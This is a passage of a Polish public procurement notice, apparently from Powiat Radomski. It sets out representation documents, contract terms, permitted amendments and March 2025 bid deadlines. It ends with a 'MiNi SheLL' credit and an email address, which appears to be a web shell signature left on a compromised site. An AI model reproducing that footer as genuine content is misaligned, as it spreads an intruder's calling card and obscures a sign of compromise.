Oświadczenie, o którym mowa w pkt. 1 Rozdział IX SWZ – załącznik nr 3 do SWZ;<br/>3) Potwierdzenie umocowania do działania w imieniu Wykonawcy:<br/>a) Zamawiający w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a), Zamawiający żąda od Wykonawcy złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/>4) Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu<br/>o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy).<br/>2. Pełnomocnictwo o którym mowa w pkt. 10 ppkt 3) lit c) i pkt 10 ppkt 4) Rozdział XIX SWZ składa się, pod rygorem nieważności w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym - w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz. U. z 2024 r. poz. 1557 ze zm.), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>3. W przypadku gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej dokonuje mocodawca.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może dokonać również notariusz.<br/>Przez cyfrowe odwzorowanie należy rozumieć dokument elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego dostępu do oryginału. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>a)	oświadczenie o których mowa w pkt. 1 Rozdział IX SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia. <br/>b)	zobowiązani są na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 4 Rozdział IX SWZ. Podmiotowe środki dowodowe, o których mowa w pkt. 4 Rozdział IX SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Umowa w sprawie zamówienia publicznego wymaga, pod rygorem nieważności, zachowania formy pisemnej. <br/>2.	Zamawiający dopuszcza - jeżeli uzna to za uzasadnione - możliwość zmiany ustaleń zawartej Umowy w stosunku do treści oferty Wykonawcy, w przypadkach, o których mowa w art. 455 ustawy z dnia 11 września 2019r. Prawo Zamówień Publicznych, a w szczególności: <br/>1) zmiany wynagrodzenia Wykonawcy, w przypadku: <br/>a) zmiany stawki podatku od towarów i usług oraz podatku akcyzowego, <br/> - jeżeli zmiany określone w § 9 ust. 1 pkt 1) ppkt a) będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. <br/>2) zmiany terminu realizacji Przedmiotu Umowy, w przypadku zaistnienia jednej z następujących okoliczności: <br/>a) zmiany będącej następstwem okoliczności leżących po stronie Zamawiającego, które spowodowały niezawinioną i niemożliwą do uniknięcia przez Wykonawcę zwłokę, w szczególności: <br/>- wstrzymania dostawy przez Zamawiającego; <br/>- wystąpienia zdarzeń wymuszających przerwę w realizacji Przedmiotu Umowy niezależnych <br/>od Wykonawcy; <br/>3) pozostałe zmiany spowodowane następującymi okolicznościami: <br/>a) przekształcenie którejkolwiek ze stron Umowy bądź zmiana adresu, <br/>b) zmiany warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna i niezbędna dla Zamawiającego; <br/>c) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację Przedmiotu Umowy lub świadczenia stron Umowy; <br/>d) innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego. <br/>3.	Szczegółowe postanowienia Umowy zawarte zostały w Projekcie Umowy Załącznik nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com